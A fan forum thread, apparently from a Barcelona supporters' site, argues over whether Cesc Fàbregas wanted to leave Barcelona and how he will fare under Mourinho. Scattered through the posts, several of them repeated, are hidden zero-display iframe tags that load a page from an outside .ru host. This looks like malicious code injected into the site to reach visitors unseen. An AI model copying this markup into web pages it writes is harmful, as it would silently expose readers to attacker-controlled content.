Cesc Fàbregas

We've got a good enough team to cover for a potential second half disappearance. ;) Plus Mourinho is a better man manager than all his previous ones, if he has a good full season, it'd be under Mou.

Also, if he has his usual second half of the season disappearance, Mou won't hesitate to bench him.

CatalinR10

He was always going to play better for another team. Wouldn't want him back even for free.

Wonder how his form will be in the 2'nd part of the season.

F

Flavia

Cesc wanted to leave just like Alexis and Song wanted to. And Abidal. Right.

No, he said it himself he wanted to leave, unlike Abidal. Don't know about Alexis or Song, but Cesc was clear. He said he asked Barto to help him leave. Unless you think he's lying, which I doubt he had any reason to.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Stric

It's naive to think Cesc wanted to leave, to say the least. Of course he won't say that publicly. He had every reason to lie. Do you also think that Alexis wanted to leave? The guy was begging to be acknowledged here and just kept repeating how he wants to stay. He just had his absolute best season for the club and gained recognition even among fans who were criticizing him in the past. But all of a sudden "he believed his time at Barca was over, he had done as much as he could and that he wanted a change in scenery"? Right. Same with Fabregas. All he had been saying since he first got back to Barcelona is how he wants to stay for the long term and plans to retire here if the club wants him. He pretty much had to say it all over and over again since he was bombarded with the same question by the press all the time. He was desperate to be a part of this again. Neither of them ever gave the slightest impression of wanting to leave, not for a second, quite the contrary. It must be a coincidence that they both changed their minds completely as soon as Enrique was appointed coach. Suddenly Fabregas feels like he has, I quote, "unfinished business in the PL". It's clear as day that Lucho didn't want them here and they were told that. Maybe in fact they did want to leave... after they were told their services are no longer wanted. Surely to some that counts as wanting to leave.

F

Flavia

It's naive to think Cesc wanted to leave, to say the least. Of course he won't say that publicly. He had every reason to lie. Do you also think that Alexis wanted to leave? The guy was begging to be acknowledged here and just kept repeating how he wants to stay. He just had his absolute best season for the club and gained recognition even among fans who were criticizing him in the past. But all of a sudden "he believed his time at Barca was over, he had done as much as he could and that he wanted a change in scenery"? Right. Same with Fabregas. All he had been saying since he first got back to Barcelona is how he wants to stay for the long term and plans to retire here if the club wants him. He pretty much had to say it all over and over again since he was bombarded with the same question by the press all the time. He was desperate to be a part of this again. Neither of them ever gave the slightest impression of wanting to leave, not for a second, quite the contrary. It must be a coincidence that they both changed their minds completely as soon as Enrique was appointed coach. Suddenly Fabregas feels like he has, I quote, "unfinished business in the PL". It's clear as day that Lucho didn't want them here and they were told that. Maybe in fact they did want to leave... after they were told their services are no longer wanted. Surely to some that counts as wanting to leave.

Fabregas told wenger the season before that he'd stay for one more year. He was already contemplating leaving back then. I think it's naive to think he wanted to stay. He saw he wasn't fitting in, probably got tired of the press too, and decided to go. His wife also wanting back to london might have been also a factor. But I don't think he was told to leave. If he didn't want to leave he wouldn't be saying this out loud. And his transfer was done pretty fast too.

Alexis is a different story to Cesc. I haven't seen him commenting about it as openly as Cesc did. He is one that was told to go, so they could get Suarez. Same with Song, Jds, Cuenca, Tello.
<iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

F

Flavia

All of a sudden he tweets he was playing injured for almost a year? Is that real?

If he had something, he found the cure pretty fast there, though. Maybe his wife should be worried :pep:

<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Kerrybai

Great player who never found his place with us... really happy to see him playing in his natural position and showing his talent.

antonnn

Blue Blooded Aussie
It'd hold more weight if he didn't dip in the second half of every season with Barca, otherwise I'd feel inclined to believe him only after he has full good season. If he has one.

Home of Barca Fans